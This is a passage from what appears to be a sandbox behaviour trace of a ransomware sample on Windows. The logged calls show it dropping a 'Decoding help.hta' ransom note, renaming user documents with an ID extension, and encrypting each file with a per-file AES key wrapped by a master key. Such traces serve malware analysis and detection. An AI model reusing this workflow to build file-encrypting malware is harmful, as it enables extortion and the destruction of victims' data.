ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0040.281] lstrcmpW (lpString1=".", lpString2="Acrobat") returned -1 [0040.281] lstrcmpW (lpString1="..", lpString2="Acrobat") returned -1 [0040.282] lstrcmpiW (lpString1="windows", lpString2="Acrobat") returned 1 [0040.283] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Adobe\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\*.*" [0040.283] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Adobe\\*.*") returned 32 [0040.283] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\", lpString2="Acrobat" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat" [0040.283] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\*.*" [0040.283] GlobalMemoryStatus (in: lpBuffer=0x530fd10 | out: lpBuffer=0x530fd10) [0040.283] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10d26a80, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0040.284] CloseHandle (hObject=0x260) returned 1 [0040.284] FindNextFileW (in: hFindFile=0x5a59b0, lpFindFileData=0x530fd30 | out: lpFindFileData=0x530fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARM", cAlternateFileName="")) returned 1 [0040.284] lstrcmpW (lpString1=".", lpString2="ARM") returned -1 [0040.284] lstrcmpW (lpString1="..", lpString2="ARM") returned -1 [0040.284] lstrcmpiW (lpString1="windows", lpString2="ARM") returned 1 [0040.286] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Adobe\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\*.*" [0040.286] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Adobe\\*.*") returned 32 [0040.286] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\", lpString2="ARM" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM" [0040.286] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\*.*" [0040.286] GlobalMemoryStatus (in: lpBuffer=0x530fd10 | out: lpBuffer=0x530fd10) [0040.286] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10d3eae8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0040.287] CloseHandle (hObject=0x260) returned 1 [0040.287] FindNextFileW (in: hFindFile=0x5a59b0, lpFindFileData=0x530fd30 | out: lpFindFileData=0x530fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARM", cAlternateFileName="")) returned 0 [0040.287] FindClose (in: hFindFile=0x5a59b0 | out: hFindFile=0x5a59b0) returned 1 Thread: id = 163 os_tid = 0xc4 [0040.289] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*", lpFindFileData=0x580fd30 | out: lpFindFileData=0x580fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xff5e9b0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xff5e9b0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a59b0 [0040.289] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.289] FindNextFileW (in: hFindFile=0x5a59b0, lpFindFileData=0x580fd30 | out: lpFindFileData=0x580fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xff5e9b0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xff5e9b0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.289] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.289] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.289] FindNextFileW (in: hFindFile=0x5a59b0, lpFindFileData=0x580fd30 | out: lpFindFileData=0x580fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a373280, ftCreationTime.dwHighDateTime=0x1d4da2a, ftLastAccessTime.dwLowDateTime=0x650ee600, ftLastAccessTime.dwHighDateTime=0x1d50be1, ftLastWriteTime.dwLowDateTime=0x650ee600, ftLastWriteTime.dwHighDateTime=0x1d50be1, nFileSizeHigh=0x0, nFileSizeLow=0x7e6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="4no91 QuYYqmyLqH-.pptx", cAlternateFileName="4NO91Q~1.PPT")) returned 1 [0040.289] lstrcpyW (in: lpString1=0x4240668, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0040.289] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0040.289] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta" [0040.289] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\decoding help.hta")) returned 0xffffffff [0040.289] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0041.162] WriteFile (in: hFile=0x31c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x580fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x580fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.163] CloseHandle (hObject=0x31c) returned 1 [0041.164] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.164] lstrcmpiW (lpString1="Decoding help.hta", lpString2="4no91 QuYYqmyLqH-.pptx") returned 1 [0041.164] lstrlenW (lpString="4no91 QuYYqmyLqH-.pptx") returned 22 [0041.164] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0041.164] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0041.164] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="4no91 QuYYqmyLqH-.pptx" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4no91 QuYYqmyLqH-.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4no91 QuYYqmyLqH-.pptx" [0041.164] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4no91 QuYYqmyLqH-.pptx" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4no91 QuYYqmyLqH-.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4no91 QuYYqmyLqH-.pptx" [0041.164] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4no91 QuYYqmyLqH-.pptx", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4no91 QuYYqmyLqH-.pptx.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4no91 QuYYqmyLqH-.pptx.[ID]g9uZrLhJaygpwRm1[ID]" [0041.164] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4no91 QuYYqmyLqH-.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4no91 quyyqmylqh-.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4no91 QuYYqmyLqH-.pptx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4no91 quyyqmylqh-.pptx.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4no91 QuYYqmyLqH-.pptx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4no91 quyyqmylqh-.pptx.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0041.165] CreateFileMappingA (hFile=0x31c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x318 [0041.165] CryptAcquireContextA (in: phProv=0x580fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x580fcec*=0x34490b0) returned 1 [0043.627] CryptGenKey (in: hProv=0x34490b0, Algid=0x6610, dwFlags=0x1, phKey=0x580fce8 | out: phKey=0x580fce8*=0x5d8410) returned 1 [0043.627] CryptExportKey (in: hKey=0x5d8410, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x580fbe4, pdwDataLen=0x580fce4 | out: pbData=0x580fbe4*, pdwDataLen=0x580fce4*=0x2c) returned 1 [0043.627] MapViewOfFile (hFileMappingObject=0x318, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e60) returned 0x4410000 [0043.629] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x580fbe4*, pdwDataLen=0x580fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x580fbe4*, pdwDataLen=0x580fcf8*=0x100) returned 1 [0043.629] CryptEncrypt (in: hKey=0x5d8410, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4410000*, pdwDataLen=0x580fce4*=0x7e60, dwBufLen=0x7e60 | out: pbData=0x4410000*, pdwDataLen=0x580fce4*=0x7e60) returned 1 [0043.630] UnmapViewOfFile (lpBaseAddress=0x4410000) returned 1 [0043.631] CloseHandle (hObject=0x318) returned 1 [0043.631] CryptDestroyKey (hKey=0x5d8410) returned 1 [0043.631] CryptReleaseContext (hProv=0x34490b0, dwFlags=0x0) returned 1 [0043.631] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.631] WriteFile (in: hFile=0x31c, lpBuffer=0x580fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x580fcf8, lpOverlapped=0x0 | out: lpBuffer=0x580fbe4*, lpNumberOfBytesWritten=0x580fcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.632] WriteFile (in: hFile=0x31c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x580fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x580fcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.632] CloseHandle (hObject=0x31c) returned 1 [0043.753] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4no91 QuYYqmyLqH-.pptx.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.753] FindNextFileW (in: hFindFile=0x5a59b0, lpFindFileData=0x580fd30 | out: lpFindFileData=0x580fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf360f30, ftCreationTime.dwHighDateTime=0x1d50da3, ftLastAccessTime.dwLowDateTime=0x3420e1d0, ftLastAccessTime.dwHighDateTime=0x1d4fd9d, ftLastWriteTime.dwLowDateTime=0x3420e1d0, ftLastWriteTime.dwHighDateTime=0x1d4fd9d, nFileSizeHigh=0x0, nFileSizeLow=0x1399e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5e_mBx7SjCEJ-.pptx", cAlternateFileName="5E_MBX~1.PPT")) returned 1 [0043.753] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0043.753] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0043.753] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta" [0043.754] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\decoding help.hta")) returned 0x1 [0043.754] lstrcmpiW (lpString1="Decoding help.hta", lpString2="5e_mBx7SjCEJ-.pptx") returned 1 [0043.754] lstrlenW (lpString="5e_mBx7SjCEJ-.pptx") returned 18 [0043.754] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0043.754] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0043.754] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="5e_mBx7SjCEJ-.pptx" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5e_mBx7SjCEJ-.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5e_mBx7SjCEJ-.pptx" [0043.754] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5e_mBx7SjCEJ-.pptx" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5e_mBx7SjCEJ-.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5e_mBx7SjCEJ-.pptx" [0043.754] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5e_mBx7SjCEJ-.pptx", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5e_mBx7SjCEJ-.pptx.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5e_mBx7SjCEJ-.pptx.[ID]g9uZrLhJaygpwRm1[ID]" [0043.754] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5e_mBx7SjCEJ-.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5e_mbx7sjcej-.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5e_mBx7SjCEJ-.pptx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5e_mbx7sjcej-.pptx.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5e_mBx7SjCEJ-.pptx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5e_mbx7sjcej-.pptx.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x260 [0043.755] CreateFileMappingA (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x320 [0043.755] CryptAcquireContextA (in: phProv=0x580fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x580fcec*=0x34491c0) returned 1 [0043.755] CryptGenKey (in: hProv=0x34491c0, Algid=0x6610, dwFlags=0x1, phKey=0x580fce8 | out: phKey=0x580fce8*=0x5a59f0) returned 1 [0043.756] CryptExportKey (in: hKey=0x5a59f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x580fbe4, pdwDataLen=0x580fce4 | out: pbData=0x580fbe4*, pdwDataLen=0x580fce4*=0x2c) returned 1 [0043.756] MapViewOfFile (hFileMappingObject=0x320, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13980) returned 0x49a0000 [0043.757] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x580fbe4*, pdwDataLen=0x580fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x580fbe4*, pdwDataLen=0x580fcf8*=0x100) returned 1 [0043.757] CryptEncrypt (in: hKey=0x5a59f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x49a0000, pdwDataLen=0x580fce4*=0x13980, dwBufLen=0x13980 | out: pbData=0x49a0000*, pdwDataLen=0x580fce4*=0x13980) returned 1 [0043.759] UnmapViewOfFile (lpBaseAddress=0x49a0000) returned 1 [0043.761] CloseHandle (hObject=0x320) returned 1 [0043.761] CryptDestroyKey (hKey=0x5a59f0) returned 1 [0043.761] CryptReleaseContext (hProv=0x34491c0, dwFlags=0x0) returned 1 [0043.761] SetFilePointerEx (in: hFile=0x260, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.761] WriteFile (in: hFile=0x260, lpBuffer=0x580fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x580fcf8, lpOverlapped=0x0 | out: lpBuffer=0x580fbe4*, lpNumberOfBytesWritten=0x580fcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.762] WriteFile (in: hFile=0x260, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x580fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x580fcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.762] CloseHandle (hObject=0x260) returned 1 [0043.763] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5e_mBx7SjCEJ-.pptx.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.763] FindNextFileW (in: hFindFile=0x5a59b0, lpFindFileData=0x580fd30 | out: lpFindFileData=0x580fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5a202e0, ftCreationTime.dwHighDateTime=0x1d4c57d, ftLastAccessTime.dwLowDateTime=0x74e96fd0, ftLastAccessTime.dwHighDateTime=0x1d4d5a6, ftLastWriteTime.dwLowDateTime=0x74e96fd0, ftLastWriteTime.dwHighDateTime=0x1d4d5a6, nFileSizeHigh=0x0, nFileSizeLow=0x39f3, dwReserved0=0x0, dwReserved1=0x0, cFileName="9O_Z3mXUixLyl.csv", cAlternateFileName="9O_Z3M~1.CSV")) returned 1 [0043.763] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0043.763] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0043.763] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta" [0043.763] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\decoding help.hta")) returned 0x1 [0043.764] lstrcmpiW (lpString1="Decoding help.hta", lpString2="9O_Z3mXUixLyl.csv") returned 1 [0043.764] lstrlenW (lpString="9O_Z3mXUixLyl.csv") returned 17 [0043.764] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0043.764] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0043.764] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="9O_Z3mXUixLyl.csv" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9O_Z3mXUixLyl.csv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9O_Z3mXUixLyl.csv" [0043.764] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9O_Z3mXUixLyl.csv" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9O_Z3mXUixLyl.csv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9O_Z3mXUixLyl.csv" [0043.764] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9O_Z3mXUixLyl.csv", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9O_Z3mXUixLyl.csv.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9O_Z3mXUixLyl.csv.[ID]g9uZrLhJaygpwRm1[ID]" [0043.764] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9O_Z3mXUixLyl.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9o_z3mxuixlyl.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9O_Z3mXUixLyl.csv.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9o_z3mxuixlyl.csv.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9O_Z3mXUixLyl.csv.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9o_z3mxuixlyl.csv.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x260 [0043.765] CreateFileMappingA (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x320 [0043.765] CryptAcquireContextA (in: phProv=0x580fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x580fcec*=0x34491c0) returned 1 [0043.766] CryptGenKey (in: hProv=0x34491c0, Algid=0x6610, dwFlags=0x1, phKey=0x580fce8 | out: phKey=0x580fce8*=0x5a56f0) returned 1 [0043.766] CryptExportKey (in: hKey=0x5a56f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x580fbe4, pdwDataLen=0x580fce4 | out: pbData=0x580fbe4*, pdwDataLen=0x580fce4*=0x2c) returned 1 [0043.766] MapViewOfFile (hFileMappingObject=0x320, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x39e0) returned 0x4410000 [0043.767] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x580fbe4*, pdwDataLen=0x580fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x580fbe4*, pdwDataLen=0x580fcf8*=0x100) returned 1 [0043.767] CryptEncrypt (in: hKey=0x5a56f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4410000*, pdwDataLen=0x580fce4*=0x39e0, dwBufLen=0x39e0 | out: pbData=0x4410000*, pdwDataLen=0x580fce4*=0x39e0) returned 1 [0043.768] UnmapViewOfFile (lpBaseAddress=0x4410000) returned 1 [0043.769] CloseHandle (hObject=0x320) returned 1 [0043.769] CryptDestroyKey (hKey=0x5a56f0) returned 1 [0043.769] 